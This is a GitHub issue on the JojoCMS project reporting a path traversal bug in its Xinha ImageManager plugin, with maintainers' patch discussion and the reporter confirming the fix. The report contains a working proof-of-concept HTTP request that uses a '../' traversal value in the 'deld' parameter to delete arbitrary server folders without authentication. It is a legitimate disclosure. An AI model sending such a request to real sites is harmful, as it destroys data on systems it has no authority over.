Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

a path travel vuln in jojocms #30

Closed
kevinoclam opened this issue Jul 27, 2017 · 6 comments
Closed

a path travel vuln in jojocms #30

kevinoclam opened this issue Jul 27, 2017 · 6 comments

Comments

@kevinoclam
Copy link

kevinoclam commented Jul 27, 2017

there is a path travel vuln that can delect any folder on the server, and it can be done by an unauthorized remote attacker
Code
./plugins/jojo_core/external/xinhan/plugins/ImageManager/Classes/ImageManager.php
line 602~608
function deleteDirs() { if(isset($_GET['deld'])) return $this->_delDir(rawurldecode($_GET['deld'])); else Return false; }
the para $_GET['deld'] shoule be filted
Poc

GET /plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images&dir=/&deld=/../../../../../../../../001/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1

before the post
default
after the post
default

Chen ruiqi
Codesafe Team

@frankblundt
Copy link
Contributor

Cool. Thanks. Will patch it.

Xinha is third-party code that is no longer being updated so will patch the local copy

@frankblundt
Copy link
Contributor

Although to get to that path you would have to have Jojo installed inside your web root folder which is not in any way recommended, for exactly this reason (and probably a whole bunch of others), which is the main reason it was designed to run from outside root.

@antonyspalding
Copy link
Contributor

I'm thinking that a requirement to have admin permissions on the xinha would cover it.

@antonyspalding
Copy link
Contributor

Okay I've added an .htaccess file that prepends a file to every file and requires the $isadmin variable to be set so that even if you do have it in the webroot you have to call it through jojo (so that $isadmin is set) and be logged in as admin.

Please test and let us know if this fixes all your concerns.

@frankblundt
Copy link
Contributor

nice.

@kevinoclam
Copy link
Author

well, unauthorized user can not use the imagemanger and extendefilemanger with the patch
the patch fixes well

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants